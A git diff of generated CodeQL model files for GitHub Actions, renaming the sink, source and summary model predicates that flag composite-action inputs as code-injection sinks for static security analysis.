a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml index 1a1d763d6e4..6c5d6edd572 100644 --- a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml +++ b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["emberjs/data", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml index a8e95d30457..fdaee61066e 100644 --- a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml +++ b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["emqx/emqx", "*", "input.profile", "code-injection", "generated"] - ["emqx/emqx", "*", "input.otp", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml index 52d085ee479..d68c4e57c8a 100644 --- a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml +++ b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eonasdan/tempus-dominus", "*", "input.VERSION", "code-injection", "generated"] - ["eonasdan/tempus-dominus", "*", "input.NUGET_API_KEY", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml index 33c56a67cb9..85a8d2f4d65 100644 --- a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml +++ b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["erlang/otp", "*", "input.TYPE", "code-injection", "generated"] - ["erlang/otp", "*", "input.BASE_BRANCH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml index 258101eecea..d2275409278 100644 --- a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml +++ b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["esphome/esphome", "*", "input.target", "code-injection", "generated"] - ["esphome/esphome", "*", "input.suffix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml index d77e05c680b..4dc0b87214b 100644 --- a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml +++ b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expensify/app", "*", "input.GPG_PASSPHRASE", "code-injection", "generated"] - ["expensify/app", "*", "input.PACKAGE_SCRIPT_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml index db98f8d769a..ea1a8a8afec 100644 --- a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expo/expo", "*", "input.ndk-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml index 7607840dbdc..5ce00c29e52 100644 --- a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expo/vscode-expo", "*", "input.command", "code-injection", "generated"] - ["expo/vscode-expo", "*", "input.semver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml index 2fa4f8dfa61..d1f551b66da 100644 --- a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["external-secrets/external-secrets", "*", "input.image-tag", "code-injection", "generated"] - ["external-secrets/external-secrets", "*", "input.image-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml index 80725157e33..6f8845ec1c0 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/buck2", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml index 9d317f14272..152fdfed447 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/flow", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml index 12deff387bd..5919ade7e81 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/yoga", "*", "input.version", "code-injection", "generated"] - ["facebook/yoga", "*", "input.directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml index 9c3c242b1ed..d9afa5bb21f 100644 --- a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebookresearch/xformers", "*", "input.arch", "code-injection", "generated"] - ["facebookresearch/xformers", "*", "input.pytorch_channel", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml index 4aa1ce5c4cf..0b36853a891 100644 --- a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fastly/compute-actions", "*", "input.fastly-api-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml index 6f8ef16ea33..2bd521d42f5 100644 --- a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml +++ b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["felangel/bloc", "*", "input.coverage_excludes", "code-injection", "generated"] - ["felangel/bloc", "*", "input.analyze_directories", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml index bc2146921ef..8ae81e706a4 100644 --- a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["firebase/firebase-ios-sdk", "*", "input.min-ios-version", "code-injection", "generated"] - ["firebase/firebase-ios-sdk", "*", "input.sources", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml index 37e1d0d67a5..4893772b71a 100644 --- a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml +++ b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["flagsmith/flagsmith", "*", "input.aws_ecr_repository_arn", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml index eabd3834b1b..e174c830a85 100644 --- a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml +++ b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flaxengine/flaxengine", "*", "input.vulkan-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml index 2253e33b950..14070215bfa 100644 --- a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-version", "code-injection", "generated"] - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml index bc1eb54056a..f3a0b47f2c2 100644 --- a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml +++ b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fluxcd/flux2", "*", "input.bindir", "code-injection", "generated"] - ["fluxcd/flux2", "*", "input.token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml index 842240cfaa2..12011d64396 100644 --- a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml +++ b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["forcedotcom/salesforcedx-vscode", "*", "input.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml index 8ff5ee1e2c0..40ecb17610e 100644 --- a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml +++ b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fossasia/visdom", "*", "input.loadprbuild", "code-injection", "generated"] - ["fossasia/visdom", "*", "input.usebasebranch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml index 29c5f793fb2..250606588f9 100644 --- a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["freckle/stack-action", "*", "input.find-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml index 2f12293df0e..f2f5678b8b8 100644 --- a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["freeradius/freeradius-server", "*", "input.gcc_ver", "code-injection", "generated"] - ["freeradius/freeradius-server", "*", "input.llvm_ver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml index 83012e51335..b17eb01f821 100644 --- a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml +++ b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gaphor/gaphor", "*", "input.version", "code-injection", "generated"] - ["gaphor/gaphor", "*", "input.base64_encoded_pfx", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml index 8ca21196194..7ebdde766f3 100644 --- a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml +++ b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getsentry/action-release", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml index 7f19fd1f6a6..7f2e1588139 100644 --- a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["github/codeql-action", "*", "input.latest_tag", "code-injection", "generated"] - ["github/codeql-action", "*", "input.major_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml index 1889fcff144..eedeb384422 100644 --- a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["github/ruby", "*", "input.builddir", "code-injection", "generated"] - ["github/ruby", "*", "input.srcdir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml index f8243352f45..fb6fb0267bb 100644 --- a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gittools/gitversion", "*", "input.distro", "code-injection", "generated"] - ["gittools/gitversion", "*", "input.targetFramework", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml index bd2015a7096..60df7484e7f 100644 --- a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml +++ b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["go-spatial/tegola", "*", "input.artifact_name", "code-injection", "generated"] - ["go-spatial/tegola", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml index 501123a82fe..d0af7b61f98 100644 --- a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml +++ b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["goauthentik/authentik", "*", "input.postgresql_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml index 1a17e3db2b8..8d08848d24c 100644 --- a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml +++ b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["godotengine/godot", "*", "input.bin", "code-injection", "generated"] - ["godotengine/godot", "*", "input.tests", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml index a125a4bfa8c..f26f672a586 100644 --- a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml +++ b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["google/dagger", "*", "input.agp", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml index e8d0cc64792..5431aad8dca 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googleapis/java-cloud-bom", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml index 736c84b68cc..92c23f9f1fb 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googleapis/sdk-platform-java", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml index 062203945c5..52654194d81 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "filename", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml index aedeb4e1023..43c274aa033 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml index 0d8afb086c9..7f8b87fa20e 100644 --- a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gravitational/teleport", "*", "input.target", "code-injection", "generated"] - ["gravitational/teleport", "*", "input.attempts", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml index 4756acbf306..31422a708c5 100644 --- a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml +++ b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["grote/transportr", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml index a0e4acec75a..30ccfdea631 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/nomad", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml index 6acfcf9773f..9bc22ac93ef 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform", "*", "input.target-terraform-branch", "code-injection", "generated"] - ["hashicorp/terraform", "*", "input.target-terraform-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml index 7e0deeea906..4ec47cb3975 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml @@ -1,13 +1,13 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/vault", "*", "input.destination", "code-injection", "generated"] - ["hashicorp/vault", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hashicorp/vault", "*", "input.vault-version", "output.vault-version", "taint", "manual"] - ["hashicorp/vault", "*", "input.vault-binary-path", "output.vault-binary-path", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml index 18678fe9ecd..81d137ce547 100644 --- a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["home-assistant/android", "*", "input.lokalise-token", "code-injection", "generated"] - ["home-assistant/android", "*", "input.lokalise-project", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml index d9d492f79cd..79675d59c05 100644 --- a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["homebrew/actions", "*", "input.casks", "code-injection", "generated"] - ["homebrew/actions", "*", "input.formulae", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml index d3046ff1fc4..3310a67347c 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hyperledger/aries-cloudagent-python", "*", "input.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml index 845fba40a6c..d12963b43db 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hyperledger/fabric-samples", "*", "input.ca-version", "code-injection", "generated"] - ["hyperledger/fabric-samples", "*", "input.fabric-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml index bcf51805710..1c63a9e6d0f 100644 --- a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml +++ b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["igniterealtime/openfire", "*", "input.domain", "code-injection", "generated"] - ["igniterealtime/openfire", "*", "input.ip", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml index e1ff1fa3497..e120de812c4 100644 --- a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["infracost/actions", "*", "input.behavior", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml index 4c5ef712e58..1be37285c9e 100644 --- a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml +++ b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["inspektor-gadget/inspektor-gadget", "*", "input.runtime", "code-injection", "generated"] - ["inspektor-gadget/inspektor-gadget", "*", "input.registry", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml index 31e1f562877..aa6e9b684d0 100644 --- a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml +++ b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["intel-analytics/ipex-llm", "*", "input.extra-dependency", 